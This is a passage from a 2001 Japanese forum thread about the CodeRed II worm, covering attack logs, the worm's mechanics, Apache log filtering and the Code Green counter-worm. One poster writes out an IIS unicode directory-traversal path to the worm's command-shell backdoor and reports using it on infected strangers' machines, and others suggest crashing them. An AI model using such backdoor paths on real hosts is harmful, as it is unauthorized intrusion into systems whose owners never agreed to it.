最初のアタックのリクエストの中に本体を詰め込んでいるわけですか。
そうすると、いよいよはた迷惑な…
>>599 >以下だけで完結するとは思えないんですが。
「URLだけじゃ3.5Kbないぞゴラあ」という疑問について。
POSTデータの中にウイルス本体があって、URLのあふれ部分は、そこにジャンプする
ように仕掛けをする最低限の部分しか入ってます。
なにげに、www.eeye.comの中にディスアセンブルリストが公開されてます。
604 :
ほれ :01/09/03 04:19 ID:gVfi7BBo
605 :
:01/09/03 04:22 ID:YEBUuhG6
>>603 なるほど、本体ごとやって来るものでしたか。よく考えているというかはた迷惑極まる
というか…。
ご指摘のリストを探してみます。
606 :
404ero :01/09/03 04:23 ID:jZzH20RI
607 :
:01/09/03 04:23 ID:YEBUuhG6
608 :
名無しさん@お腹いっぱい。 :01/09/03 04:25 ID:YEBUuhG6
>>606 そりゃ、あなたの現在のIPが61だからでは?
609 :
579 :01/09/03 04:29 ID:gVfi7BBo
>>585 ディスアセでウラをとってみた。
ちゃんと相手に届いてるかどうか、send()の返り値の確認 & recv(1バイトだけ)を
行って即close()してました。
すぐにcloseすると、ちゃんとインデックスサーバのコードが起動されないから、
受信完了も待つのではとかすかに期待したが、そんなことはなかった(w
やはり大量データを応答してCodeRedIIを困らせるという作戦はやっぱり没。
610 :
:01/09/03 04:42 ID:YEBUuhG6
>>609 seg000:00000366のあたりでちゃんと考えてありますねぇ…。
何か良い方法は無いものか…。
611 :
名無し :01/09/03 04:47 ID:B/J7A8oc
>>597 ADSLのIPは、61.*.*.* で以前とは変わっていません。
612 :
:01/09/03 04:56 ID:YEBUuhG6
>>611 ですか。そうするとなんでだろ。私の所にはもう連日大入り満員です。
パチンコ屋だったらありがたいですがCodeRed2では。
613 :
名無し :01/09/03 05:35 ID:B/J7A8oc
>>612 FLETS ISDNのときは 切断で 61 211といろいろ IPが変わりました。
そのときは、どのIPでも いっぱいきましたが 今ADSLでは全くきません。
ちなみに プロパは、ODNです。
2chを睥睨して寄りつかなかったリアルハッカ−兼有能なSEさん方 も、知識欲を刺激するこのスレのお陰で書き込んでいるもよう。 (・∀・)イイ!!
615 :
:01/09/03 06:08 ID:YEBUuhG6
>>613 もちろんルーターは静的NATやDMZの設定になっているわけですよね?
不思議ですな。
うちは現在のところ211ですが、ガンガン来ています。
他の61の方はどうなんでしょう
616 :
RealPlayer :01/09/03 06:10 ID:n9XPzzkE
W2KのMSのCR対策パッチ当てると、RealPlay起動でマシンが リセットされる。 index service止めたら直ったヨ。 Duron750 見れのG450
617 :
:01/09/03 07:33 ID:YEBUuhG6
2001/07/17 07:27 80,282 geroshabu43.zip 2001/07/18 22:30 12,255 kankiri100.zip 2001/07/16 21:56 313,582 Longi018.lzh 2001/03/29 22:29 26,624 Longinus.dll 2001/05/24 10:44 599,040 Longinus.exe 2001/08/03 07:28 431 Longinus.ini 2001/05/24 10:50 3,794 Longinus.txt 2001/08/12 20:14 <DIR> sakura0f2 2001/08/12 20:14 <DIR> siri&crack 2001/08/12 20:14 <DIR> HamaEvolution 2001/08/12 20:14 <DIR> iria107a こういうファイル名がc:\にズラズラ並んでいる人でも、CodeRed2の餌食になってい ますな。net sendで警告しておきました。
618 :
名無し :01/09/03 09:39 ID:B/J7A8oc
>>615 ええ ルーターの内側にWEBサーバーがあり PORT80で外から参照できます。
全く 不思議です。
他の方で 住友のTE4000/4100を使っている方は、いないのでしょうか?
以下 ルーターのFWバージョンです。
MegaBit Gear TE4000 Ethernet Modem, G.lite, Annex C
Hardware Revision: 0001
Software Version: 01.22 (Mon Apr 2 15:59:21 JST 2001)
Boot ROM Version: 01.22 (Mon Apr 2 16:00:38 JST 2001)
DSP Firmware Version: 7.31
MAC Address: 00:00:**:**:**:**
619 :
名無しさん@お腹いっぱい。 :01/09/03 15:41 ID:jPJmSlF6
620 :
名無しさん@お腹いっぱい。 :01/09/03 19:02 ID:x0k.eZyE
>>618 うちも61.xxx系ですが、9/1にぱたっと来なくなりました。
9/1の到着数の累計は0です。
9/2の午後からは、また来始めましたが。今も来てます。
同じくTE4000を使ってます。
621 :
名無しさん@お腹いっぱい。 :01/09/03 22:57 ID:A2Kvd.mA
明日のNHKニュース10 CodeRed特集らしい。 どうせ内容は期待できないけどね。
622 :
名無しさん@お腹いっぱい。 :01/09/03 22:58 ID:rWcH8A0o
あしたNHK ニュース10でコードレッドの特集をやるらしい。 既出かな。
623 :
621 :01/09/03 22:59 ID:A2Kvd.mA
かぶった。一歩おそかった。
625 :
名無し :01/09/04 05:40 ID:tv8XnI5A
>>620 試しに 一度切断して IPを変えたところやって来ました。
以前と変わらないペースで(W
IP変更後も61.*.*.*は、変わらないので RedのアルゴリズムではIPアドレスを
総なめにするわけではないようですね。
[04/Sep/2001:04:52:13 +0900] pasocon.nsc1.co.jp 晒し
626 :
:01/09/04 10:45 ID:NbbivV4M
今日接続し直したら211から61へIPが変化しました。 が、相変わらず猛烈なCodeRed2の嵐が吹き荒れております。 ひょっとして治まるかと思い、ちょっと期待していたのですが。
627 :
:01/09/04 11:01 ID:NbbivV4M
>>625 するとCodeRedのアルゴリズムで生成されないIPにうまく当たった時、攻撃の網から
漏れるという事になりますか。
>>619 MicrosoftのHPへリダイレクトさせてnet sendを送るというプログラムですが、まず
リダイレクト自体を受けつけるかどうか。
net sendの方はこのままでは失敗する確率も高いかと思います。
scripts/root.exe
よりも
scripts/..%c0%af../winnt/system32/cmd.exe
の方が通る率が高いようです。
私は日本のIPから来た時だけ手動でやっていますが、効果はありますよ。
警告を入れると大抵ネットから切断されます。
英語、日本語で同じ文面の警告を一回づつ送信するようにすれば完璧ですかな。
628 :
秋厨 :01/09/04 12:53 ID:WndhDzug
約1月、このような調子が続いています。これもCODEREDでしょうか。 ZAQに問い合わせても埒が開かきません。 厨房にできる対策があればご教示下さい。 Alert 01/09/04 12:40:29 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細: インバウンド TCP 接続 リモートアドレス、 ローカルサービスは 211.239.86.43,http Alert 01/09/04 12:40:23 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細: インバウンド TCP 接続 リモートアドレス、 ローカルサービスは 211.239.86.43,http Alert 01/09/04 12:40:20 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細: インバウンド TCP 接続 リモートアドレス、 ローカルサービスは 211.239.86.43,http Alert 01/09/04 12:37:36 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細: インバウンド TCP 接続 リモートアドレス、 ローカルサービスは 211.181.246.98,http Alert 01/09/04 12:37:30 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細: インバウンド TCP 接続 リモートアドレス、 ローカルサービスは 211.181.246.98,http Alert 01/09/04 12:37:27 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細: インバウンド TCP 接続 リモートアドレス、 ローカルサービスは 211.181.246.98,http Alert 01/09/04 12:36:27 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細: インバウンド TCP 接続 リモートアドレス、 ローカルサービスは 211.135.12.65,http Alert 01/09/04 12:36:21 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細: インバウンド TCP 接続 リモートアドレス、 ローカルサービスは 211.135.12.65,http
629 :
:01/09/04 14:40 ID:NbbivV4M
>>628 恐らくCodeRedでしょう。きちんとブロックされていますので何ら大過は無いと思います。
これはもうZAQに問い合わせても対処のしようがありません。
もしもルーターかFWのフィルタ設定が可能でしたら、Port80をリジェクトするように設定
されれば、この実に頻発する警告から解放されます。
ところでうちで現在、
>>619 さんの指摘されたカウンタープログラムをPHPで組んで動か
しておりますが、効果があるのか無いのかサッパリ不明です。
630 :
秋厨 :01/09/04 17:18 ID:WndhDzug
>>629 有難うございます。少し安心できました。
警告うざいのでルーター導入を考えてみようかと考えています。
631 :
:01/09/04 17:31 ID:NbbivV4M
>>630 そういう警告が出るところを見ると、何かFWソフトが入っているでしょうから、明示的に
Port80を遮断する設定にすればOKですよ。
スクリプトをしかけて以降、1時間に2アタックに激減しとります。効果があるんでしょ
うか。
632 :
秋厨 :01/09/04 17:54 ID:WndhDzug
>>631 ノートンを入れています。Port80は、IGMPプロトコルを遮断すると
なっていました。ブロックされているということですのでやはり
警告は放置しておくことにします。ご親切にどうもです。
関係ありませんがこの板変ですね。
634 :
test :01/09/04 19:20 ID:rflmgZhU
今夜、NHK ニュース10でコードレッドの特集やるらしいけど、 えーん氏は出演するのかな??
635 :
名無しさん@お腹いっぱい。 :01/09/04 20:13 ID:AxzkIkS2
えーんage
| 。 |⌒ヾ |冫、) |` / ジー | / |/ |
637 :
名無しさん@お腹いっぱい。 :01/09/04 22:00 ID:qxlGO2z6
NHKage
638 :
名無しさん@お腹いっぱい。 :01/09/04 22:02 ID:NMeHuGg6
ニュースのさわりにちょっとやってたね>ニュース10
639 :
名無しさん@お腹いっぱい。 :01/09/04 22:18 ID:NMeHuGg6
はじまったね。
640 :
名無しさん@お腹いっぱい。 :01/09/04 22:22 ID:nUqM7pj2
苦情があいついだISPってどこよ?
641 :
:01/09/04 22:23 ID:QnLzruDk
眠そうな三沢見たいな顔だ。社長
642 :
なーなし :01/09/04 22:24 ID:qhuJzpbE
コードレッドって、ウィルスだったんですね>NHK ワームだと思ってたよ。
643 :
:01/09/04 22:24 ID:eC9LqcGM
葬手苦だ...
>>640 東京メタかなかインターリンクかな
気になったのだが、え〜ん氏=平○氏?
645 :
:01/09/04 22:25 ID:e.5HhGyM
オワタ
連続書き込み失礼。 くだらない突っ込みなのでsageで。 ウィルスウィルスって・・・ワームだと思うのだが。 「技術の進歩に伴って、codeなウィルスが・・・」って、掛けてあるのかな?(藁 でも、思ったより短かったな。もっとやるべきだと思うのだが。
647 :
名無しさん@お腹いっぱい。 :01/09/04 22:26 ID:VNIRlFow
CodeRedってワームでしょ。NHKが無知なのか 認知しやすい言葉で置き換えたのか・・・。
648 :
名無しさん@お腹いっぱい。 :01/09/04 22:27 ID:fh8H140E
この影響受けた会社ってめた○っくのこと?通信障害起こしてたのはめた○っく以外知らない。
番組中で「コードレッドバスター」って言ってたような。(w なのでインターリンクかな。
650 :
名無しさん@お腹いっぱい。 :01/09/04 22:28 ID:8Is9q6Zo
>>644 コードレッドバスター(w
CodeRedとIIがゴッチャになってたな。
まぁ取り上げただけマシということでしょう、きっと。
651 :
名無しさん@お腹いっぱい。 :01/09/04 22:29 ID:870dclA.
つーか、ある意味ではセキュリティーホール突くわけだからワームか?
普通のウイルスに比べて地味でしょ。 ニュース性に乏しいってイテタヨ
654 :
644 :01/09/04 22:33 ID:bt7mwv6E
>>652 そですかー。
そりゃ総鉄屑つかってるわけないもんな(w
655 :
名無しさん@お腹いっぱい。 :01/09/04 22:34 ID:/7CoF25U
>>653 だからウイルスに感染しても気付かない奴が多い。
ITとか言ってる前にそこから何とかしてくれ。
おれが念を押したのは、「初期の9月で終わると、いうことが無くなった。」と 「ダイヤルUPでも感染者がかなりいる。」この二つ。
某放送局はこの板見てたよ。 途中からおれが書き込まなかったのはその為。
CATV内部では感染者数が徐々にピーク時に戻りつつあり。 鬱だ・・。
659 :
名無しさん@お腹いっぱい。 :01/09/04 23:31 ID:nVESYnOU
おれは、プロバの人間だが、 CodeRedによるアクセスの苦情を受けて、該当する感染者に連絡するのだが、「対応拒否」する馬鹿がたまにいて困ってるよ。 一番の被害者は自分自身だってのが解らねえのかな? MSもこんなやつに2000なんぞ使わせるなよ。
660 :
名無しさん@お腹いっぱい。 :01/09/04 23:44 ID:fh8H140E
>>659 その警告ってメールで警告するの?それとも電話?
会社名とかは出さなくていいから教えて欲しいんだけど。
警告無視するやつはデータ消えたのプロバのせいにすると思われ。
対応拒否って何で? そいつらは「自分がCode redに感染している」及び 「回りを攻撃している」事実は認識してるの?対応拒否?馬鹿? 逆にそういうやつを野放しにしてたらプロバの信頼に関わると思われ。 まぁプロバ側はしょうがないんだろうけど・・・なんだかなぁ。
662 :
名無しさん@お腹いっぱい。 :01/09/04 23:51 ID:KuXLl5i2
IISのセキュリティ問題が出るたび MSの責任問題にならないのが毎回不思議なのですが・・・
663 :
名無しさん@お腹いっぱい。 :01/09/05 00:11 ID:1/CEs.Mg
X-B○X遅れもバグのせい?
対応拒否の考えられるパターン(予想) 1)開き直り 他のところも感染してるから、ウチだけ対応したくない。 他が全部対応したらウチも対応してやる。 感染して困る所は自分で対応すればいいだろう、ウチは感染しても困らないから対応しないぞ! どうしても対応して貰いたかったら、金出せ! 2)とぼける はぁ〜、なんですか「それ」 法律や規則で対応するって決まっているんですか? えっそういう訳ではないの? じゃ面倒だからしません。
665 :
名無し :01/09/05 00:45 ID:czFYeVUU
IPを逆引きすると不思議なドメイン名称がやってくる、よく分からん。 [04/Sep/2001:23:04:34 +0900] web - - "GET /default.ida? [04/Sep/2001:23:08:32 +0900] bymain - - [04/Sep/2001:23:21:20 +0900] yl-hncmptg0852b - - [04/Sep/2001:23:40:36 +0900] jhkim - - [04/Sep/2001:23:41:43 +0900] bsy - - [04/Sep/2001:23:48:09 +0900] milibo - - [05/Sep/2001:00:00:12 +0900] king104 - - [05/Sep/2001:00:14:41 +0900] wang2 - - [05/Sep/2001:00:15:08 +0900] nib - - [05/Sep/2001:00:26:15 +0900] soo - -
666 :
:01/09/05 01:22 ID:euhcl.mU
>>659 そりゃ本当ですか?
困ったなあ。
>>664 それじゃ、結局ホールを突いてシステムをクラッシュしてやるしかないという事になり
ますか。
でも、当人のデスクトップやマイドキュメントに保存しているファイルや、メールの中身
すら読めてしまうというのに、それでも対応拒否なんですかな。
>>665 ログを逆引きさせずに保存してみては?
対応拒否っていうよりも、対応法説明されても、ちんぷんかんぷんで 「できない」って答える人も多そう。 「そこまでいうなら来て直してくれ」とかいわれませんでした? 個人でWin2000の人ならそいつの責任だけど、 小さな会社でサーバ立てた人間が辞めると分かる人が 誰もいなくなるという例は結構ある。 この場合本当に「できない」んですよね。 ネットに繋ぐなとは言えないし・・・。
鯖立てる責任みたいなのはあると思うんだけどなぁ・・・
>668 でもFrontPageExpress入れると本人の意思と無関係にIISがEnable になるとかって話なかったっけ?
うちは、LINU&アパッチなんで、今回は関係ないですが、 いちおう上司に危険性の事を話したら、 『プロバイダを通してるのに、そんな危険なもんが来るのか!?』 とか言われた・・┐(;´Д`)┌
うちはりなっくすだから感染しないですっていったら、 少し誇らしげな表情をしていた(;TДT)
672 :
名無しさん@お腹いっぱい。 :01/09/05 21:02 ID:siKDsk7M
なんとなく、 上司「メモリを増やしたんだ、すごいだろう」 部下「どのくらい増やしたんですか?」 上司「2枚だ」 というジョークを思い出してしまった。
某CATVネットでは警告メールがでてます。 感染したまま放置した場合、利用を停止することがあるとか。 警告を無視した場合は加入契約の継続を断るとまで書いてました。 有料サポートの案内も一緒に書いてあったけど(w
>>673 それぐらいの対応で普通じゃないのかな。
とりあえず切断しちまえよ。
675 :
:01/09/06 00:35 ID:Pqo8iEOE
そういう強硬手段を採らざるを得ないという事は、やはり警告を無視する人、 放置したままの人が多いという事ですか?
676 :
名無しさん@お腹いっぱい。 :01/09/06 00:47 ID:RzgEqgQY
root.exe叩いてくるバカがいます。たすけてください・・・
677 :
:01/09/06 00:53 ID:w/4xwCVE
何気に思うんだけど、新規でIIS走らす鯖機導入して 立ち上げ直後に新規感染してたら、、全然減らないぞ(#゚Д゚) マイ糞、もちっと水際で防ぐ努力しろ。
678 :
名無しさん@お腹いっぱい。 :01/09/06 01:46 ID:Z55tpNiY
コードレッドってある日になったら、サーバ落とすんだっけ? サーカムと混乱している可能性あり。
679 :
:01/09/06 02:15 ID:1tmlAHrY
680 :
名無しさん@お腹いっぱい。 :01/09/06 02:21 ID:O2.bL52c
>>677 いきなりグローバルの海に晒したままインストールしちゃダメ!
初歩の初歩だべさ。
681 :
677 :01/09/06 02:33 ID:1tmlAHrY
>>680 いや、っていうか、新規導入って事はそれすら知らないユーザーって事も有
りうるわけで。。。
>>677 同意
>>680 のいう事は正論だけど、実際にそれをしない奴らが山ほどいるよ!
この前(8月はじめ)も、不安定になったサーバーの相談を受けたので、CodeRedの感染の可能性を示唆したら・・・
「それは無いと思います、何度も再インストールしてちゃんとパッチも当てました!」と逆ギレされそうになった。
でもね、ネットに接続したまま再インストールしたんだって。
※確かに環境によっては、切った状態でインストールするのは面倒な時もあるしな・・
手間が増えた分の費用の総額って凄くないか!
>>682 せめてFirewallの設定を変更してグローバルからの接続を
総蹴りにしてからやって欲しいな
685 :
名無しさん@お腹いっぱい。 :01/09/06 22:58
>>682 そういえば確かに「ちゃんとやった!」、「間違いなく指示通りにやった!」というクライアントの
主張が正しかった事は一度もないです。
686 :
名無しさん@お腹いっぱい。 :01/09/07 00:56
対CodeRedワームCodeGreen期待あげ
687 :
名無しさん@お腹いっぱい。 :01/09/07 02:06
とりあえず、最近の状況連絡っす。@CODERED WATCHER あげ いまだ、衰えず こーどれっどちゃん [2001/09/03 22:18:24] CodeRed Type XXXXX from: 210.150.114.xxx / c114192.ap.plala.or.jp [2001/09/03 22:44:50] CodeRed Type XXXXX from: 202.107.80.xx / [2001/09/03 23:09:10] CodeRed Type XXXXX from: 202.123.198.xxx / [2001/09/03 23:42:41] CodeRed Type XXXXX from: 202.207.210.x / [2001/09/04 1:42:03] CodeRed Type XXXXX from: 202.98.84.xxx / [2001/09/04 1:55:17] CodeRed Type XXXXX from: 202.99.60.xxx / [2001/09/04 1:56:32] CodeRed Type XXXXX from: 202.109.139.xx / [2001/09/04 2:50:03] CodeRed Type XXXXX from: 202.39.13.xxx / [2001/09/04 3:27:50] CodeRed Type XXXXX from: 202.197.107.x / [2001/09/04 3:30:55] CodeRed Type XXXXX from: 202.125.86.xxx / [2001/09/04 4:15:23] CodeRed Type XXXXX from: 202.107.35.xx/ [2001/09/04 5:45:08] CodeRed Type XXXXX from: 202.130.13.xxx / [2001/09/04 7:04:02] CodeRed Type XXXXX from: 202.119.46.xx / astronomy.nju.edu.cn [2001/09/04 7:17:09] CodeRed Type XXXXX from: 202.43.87.xxx / [2001/09/04 7:40:08] CodeRed Type XXXXX from: 202.21.4.xx / [2001/09/04 7:43:44] CodeRed Type XXXXX from: 24.38.194.xxx / cc927782-c.etntwn1.nj.home.com
晒すのが目的じゃないからじゃない?
そういう意味じゃなくって晒すと法的に問題あるの? ただの、感染者のプライバシーに対する配慮だけ?
でもリモホの方は伏せてないから一部バレバレだと思うのは漏れだけ?
692 :
名無しさん@お腹いっぱい。 :01/09/07 20:10
http://headlines.yahoo.co.jp/hl?a=20010907-00050632-reu-int 中国で新たなウイルス「コード・ブルー」が出現
[北京 7日 ロイター] 世界中で大きなの被害をもたらしたワーム型コンピュータウイルス「コード・レッド」に類似したウイルス「コード・ブルー」が、中国で出現した。
中国のコンピューターのセキュリティ専門家は、既にウイルスの分析にかかっているという。
コード・ブルーの被害規模については明らかになっていない。
新華社によると、コード・ブルーは徐々にコンピューターに感染していき、結果的にシステムが破壊される。
(ロイター)
[9月7日19時18分更新]
これって・・・。
693 :
名無しさん@お腹いっぱい。 :01/09/07 21:09
>>692 ガイシュツの変種に勝手な名前付けて騒いでる可能性大。
>692 コード・グリーンは?? ・・どうでも良いけどいつの間にID表示無くなったん?
696 :
名無しさん@お腹いっぱい。 :01/09/07 22:16
なんかおれのPCがCode RedVに感染したとメッセージでた。 Vって聞いたことないが・・・。だれかわかる?
697 :
名無しさん@お腹いっぱい。 :01/09/07 22:56
こうなったら日本はコードイエローで応戦しる!
698 :
名無しさん@お腹いっぱい。 :01/09/07 23:40
>>697 IISワーム戦隊コードファイブってか?(ワラ
699 :
名無しさん :01/09/07 23:54
>696 CodeRedIIにしっかりやられてBackDoorできてるんでないの?親切な人が教えて くれたんだろ。ちょっと恥ずいかもしれんぞ。
コードイエローの好物はやっぱカレーなんすか?
個人的にはピンクがいいと思われ。
第十六話「偽グリーンに気を付けろ!」の巻
コードスケルトン希望
707 :
名無しさん@お腹いっぱい。 :01/09/08 13:21
>>695 CodeGreenが来るとどんなアクセスログが残るんでしょう?
GGGGGGGGGGGGGGGGGGGGGGGGGGGG なんすかね?
自宅鯖のログには今のところ変った感じはないのだが...
708 :
名無しさん@お腹いっぱい。 :01/09/08 13:55
ただし、Code Greenには時限消滅機能がついていないらしく、ある意味Code Redよりたちが悪いかも。
710 :
名無しさん@お腹いっぱい。 :01/09/08 16:31
>>709 Greenが全部にパッチ当て終われば自然消滅するだろう。
>>708 この情報張ってくれてサンキュ
サイトに入れます。
>>708 >侵入したCode Greenは,MSサイトからパッ
>チをダウンロードしてあててくれる。
爆笑〜♪
SecurityFocus.com に行ってもどこにあるんだかわからなかったよ…… メーリングリストなんだよね。
>>713 直リン張ったページの中に下記の直リン有る
www.securityfocus.com/templates/archive.pike?mid=211428&part=.1&list=82
↑コードグリーン
www.securityfocus.com/templates/archive.pike?mid=211462&part=.1&list=82
↑CRcrean
両方ともzip直リン。
コードグリーンの方は、asmのソースとバイナリが拡張子txtにして入ってる。
READMEも付いてる。#use it at your own risk!って決り文句書いてあるけど(w
最初、某ウイルスサイトで見つけたのと同じだから大丈夫?でしょう。。
但し、
>>708 の記事にも書いてある様に、両者ともソース公開してるから
騙りの亜種登場する可能性否定できないね。。。
解ってる奴がちょっといぢくれば、、、色々でしょ。どの様に使うかは、
your own riskだし。
ownで済めばな・・・
ownで済まないのがワームの怖いところだね。。。
>>710 「CRclean」は2001年11月に消えるけど、「Code Green」はパッチが当てられていようといまいと
世界中のシステムに侵入を繰り返し、結局Code Redのようにトラフィックの低下を招くのでは?
そこが不安。
CRcleanくらいなら、どこか関係機関から犯罪にならない、もしくは しないというお墨付きが欲しいな。。無理か。。
最低でもSP1あててないとCodeRedパッチって使えないんだよね? SP1/SP2を入れてないノーマルW2Kなマシンを検知した時はどうするんだろう? どっちにしてもパケット吐きまくるとなるとしばらくはウザイことにかわりはないのかな
では、破壊した方が速いということで満場一致
722 :
名無しさん@お腹いっぱい。 :01/09/09 03:39
今日は1つも来なかった…ある意味恐い… みんなはどうですか?
723 :
名無しさん@お腹いっぱい :01/09/09 04:02
最近の状況連絡@CODERED WATCHER あげ 衰えず こーどれっどちゃん [2001/09/08 23:32:32] CodeRed Type XXXXX from: 61.194.132.xxx / h1321xx.ap.plala.or.jp [2001/09/09 0:07:47] CodeRed Type XXXXX from: 210.136.241.xxx / tokyo3-xx.pias.ne.jp [2001/09/09 0:34:55] CodeRed Type XXXXX from: 210.83.133.xxx / [2001/09/09 0:52:24] CodeRed Type XXXXX from: 210.64.51.xxx / [2001/09/09 1:25:48] CodeRed Type XXXXX from: 210.136.196.xx / adslstm1-pxx.hi-ho.ne.jp [2001/09/09 1:30:57] CodeRed Type XXXXX from: 210.205.238.xx/ s210-205-238-xx.thrunet.ne.kr [2001/09/09 1:35:29] CodeRed Type XXXXX from: 61.194.132.xxx / h132xxx.ap.plala.or.jp [2001/09/09 1:57:07] CodeRed Type XXXXX from: 61.194.132.xxx / h132xxx.ap.plala.or.jp [2001/09/09 2:03:21] CodeRed Type XXXXX from: 210.136.218.xx / [2001/09/09 2:17:43] CodeRed Type XXXXX from: 210.136.241.xxx/ tokyo3-xx.pias.ne.jp [2001/09/09 2:31:17] CodeRed Type XXXXX from: 210.136.241.xxx / tokyo3-xx.pias.ne.jp [2001/09/09 2:48:49] CodeRed Type XXXXX from: 210.78.138.xxx / [2001/09/09 3:16:18] CodeRed Type XXXXX from: 210.127.33.x/ pdf4xx.dongbu.co.kr [2001/09/09 3:21:22] CodeRed Type XXXXX from: 210.222.178.xx/ [2001/09/09 3:52:20] CodeRed Type XXXXX from: 210.98.146.xxx /
>>722 未だに1時間に10個は来るなあ。今割り当てられてる IP は211.* 。
CodeGreenがCodeRedのペースで広がったら、数日で行き渡るよね。
……あ、今度はCodeGreenからのアクセスがバンバンくるのか。
ウチは5分に一個のペース。IPは210.*(殆どKrかCh、たまにJP) 黒氷がチカチカするとウザイけど、完璧に来なくなるのもチョト さみしいカモ....
726 :
名無しさん@お腹いっぱい。 :01/09/09 10:48
Code Rcleanの方がいいですかね?
CodeRed養殖したいんですけど?
728 :
名無しさん@お腹いっぱい。 :01/09/09 12:26
NPFは正常に起動中…たまたま運がよかったのかも。 でも、あるページの表示が遅いのは明らかにコードレッドのせいだよな。
732 :
名無しさん@お腹いっぱい。 :01/09/09 23:26
>732 なんか、レッドと喧嘩するみたいね(w
apacheのエラーログがコードレッドだらけで読めないんで、 とりあえず、エラーだけでも出ないように、 default.idaに対する要求を、当たり障りのないようにゲイツの会社の頁にRedirectしたんだけど、 みんな、他に被害を最小限にくいとめるための、ほんとにちょっとした対策とかって どんなのしてらっしゃいます?
>>734 ガイシュツだと思うけど、リダイレクトはあんまり
意味無い。げいちゅに反省促すのはいいけど。
ログの振り分けは別スレにあったが。漏れはsedで
十分なんだが(w
>>735 NOT Foundのエラー消すためだけのリダイレクトだったんで、
効果ないのは解ってたんですが、
だからって、知らない人のホストにリダイレクトするのも
気がひけたので(^^;;
ところで、ログの振り分けの事がかいてある別スレって
どこかおぼえてらっしゃいます?
>>736 > NOT Foundのエラー消すためだけのリダイレクトだったんで、
勘違いスマソ
> ところで、ログの振り分けの事がかいてある別スレって
> どこかおぼえてらっしゃいます?
http://cocoa.2ch.net/test/read.cgi?bbs=unix&key=985980991 UNIX板だった。「Apache関連」201,222あたり。
---- コピペ開始 ----
> とりあえず XXXX 系のログだけでも隔離しよう。
> FreeBSD の場合だと。
> SetEnvIf Request_URI default\.ida code-red
> CustomLog /usr/local/apache/logs/access_log combined env=!code-red
> CustomLog /usr/local/apache/logs/codered_log common env=code-red
---- コピペ終了 ----
>>735 さんきゅっす!!
さっそくやってみます!!
739 :
名無しさん@お腹いっぱい。 :01/09/10 17:00
740 :
名無しさん@お腹いっぱい。 :01/09/10 23:26
最近、ポートを塞いだCodeRed感染マシンが増えたような気がしませんか? ひょっとしてFWかルータを使ってポートを塞ぎ、「これで安心」と思いこんでいるのでは。
>>740 何で解るの?
ひょっとして、アタックログ見るの密かな楽しみにしてない?
742 :
名無しさん@お腹いっぱい。 :01/09/11 00:22
>>740 同じことは感じますが、
塞いでるのかもしれないし、PROXYかもしれない。
743 :
名無しさん@お腹いっぱい。 :01/09/11 11:00
>>741 大体常連さんはわかります。穴を利用して警告を送るようなcgiをしかけているわけで
すが、警告が行くと大抵は回線を切断するようです。その後、また常連らしき人から
アタックが来るわけですが、調べてみると今度はポートへ接続できない。
しかしCodeRedからは攻撃が来る。という事は、根本的な対策は何も打たないままで
ポートを塞いでいるだけではないかと思われます。
744 :
名無しさん@お腹いっぱい。 :01/09/11 11:27
昨日からPort80にこんな感じでYBBユーザーからアクセスが来まくっているん ですが、これはコードレッドなのでしょうか? Date & Time Action Service Host Name 01.9.11 11:18:48 AM Deny Web Sharing yahoobb224212***.bbtec.net 01.9.11 11:18:47 AM Deny Web Sharing yahoobb224212***.bbtec.net 01.9.11 11:06:29 AM Deny Web Sharing yahoobb224251***.bbtec.net 01.9.11 11:06:29 AM Deny Web Sharing yahoobb224251***.bbtec.net 01.9.11 11:06:28 AM Deny Web Sharing yahoobb224251***.bbtec.net 01.9.11 11:00:25 AM Deny Web Sharing yahoobb224251***.bbtec.net 01.9.11 11:00:24 AM Deny Web Sharing yahoobb224251***.bbtec.net 01.9.11 10:32:08 AM Deny Web Sharing yahoobb224212***.bbtec.net 01.9.11 10:32:07 AM Deny Web Sharing yahoobb224212***.bbtec.net
745 :
名無しさん@お腹いっぱい。 :01/09/11 11:31
746 :
名無しさん@お腹いっぱい。 :01/09/11 17:23
『コード・ブルー』のHTTPアクセスログが見たい。
747 :
名無しさん@お腹いっぱい。 :01/09/11 19:15
>>747 telnetポート開けてるホストなんてそんなに無いとおもうよ。
たぶん、第2のCode Redにはならないと思う。
最近のRedHatって、telnetポート初めから開いてたっけ?
私、xinetdごと閉じちゃったから、わかんないや。
749 :
名無しさん :01/09/11 21:04
何かマスコミやNetの尻馬に乗って「MSなんか使ってるからだよ。うちは Linux+Apacheだから全然大丈夫」なんてホザいてパッチ当ててない自称 パワーユーザーとかがやられそうな気がする。
>>748 一旦社内に持ち込まれると危ないかもしれない。
Internetにさらしている奴は少ないけどFirewallの内側では
開けている鯖って結構多いんじゃないかな?
751 :
名無しさん@お腹いっぱい。 :01/09/11 21:37
最近WebArenaで会社のホームページを作ってるんだけど まだどこにもリンクされてないからアクセスログに載るのはCode Redのアタックだけ。 1日に100回以上来てる。おかげで毎日アクセスログを見る楽しみ(鬱 なんかこの手のワームが蔓延したらそれだけでネットワークの負荷が大きくなりすぎて インターネットがパンクしちゃうんじゃないかな。
752 :
名無しさん@お腹いっぱい。 :01/09/11 22:22
>>747 の記事だと対象OS は Solaris,SGI IRIX,OpenBSD のようで
Linux は入ってないみたいだけど、逆になんでこの4つなのかな。
これらの telnetd ってみんな同じ、または同じところから派生してる
ってことかな。派生元が同じなら、もっとほかの Unix も影響しそう
なもんだけど。
>>752 > なんでこの4つなのかな。
「なんでこの3つなのかな」のマチガイ(藁
754 :
名無しさん@お腹いっぱい。 :01/09/11 23:58
Linuxのtelnetd(0.17以前)にも、バッファオーバーフローの 問題が見つかったとこなのにね。 それとは、関係ないのかな。 どういうしくみなんだろ。 時期バージョンでは、それもついてくるって事かな? っていうか、テルネット切れ。SSHつかえ。
>>753 数より被害の大きさを狙えばSolarisは外せないんじゃないかな。
IRIXとOpenBSDは同じ穴があったってことでは?
FreeBSDも一寸前に穴を塞いでいたから塞ぐ前のは危ないの
かも知れない。
本来 Solaris狙いの worm で、他のはたまたま引っかかったって ことね、なるほど。 しかしバッファオーバフローの穴っていつまで経ってもポコポコ 出てくるなぁ。C で書いてる限り不可避なのか…。
757 :
名無しさん@お腹いっぱい。 :01/09/13 04:03
で、CodeBlue は今流行ってるの? 実際のアタック報告はないのかな。
